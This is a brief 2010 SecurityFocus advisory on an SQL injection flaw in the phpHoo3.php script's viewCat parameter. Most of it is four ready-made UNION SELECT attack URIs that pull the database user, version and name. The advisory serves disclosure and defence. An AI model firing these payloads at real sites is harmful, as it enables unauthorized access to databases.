phpHoo3 'phpHoo3.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,0,CONVERT(CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())+using+latin1),0,0,0,0,0--
http://www.example.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,0,user(),@@version,0,0,0,0,0--
http://www.example.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())--
http://www.example.com/phpHoo/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())--


 

Privacy Statement
Copyright 2010, SecurityFocus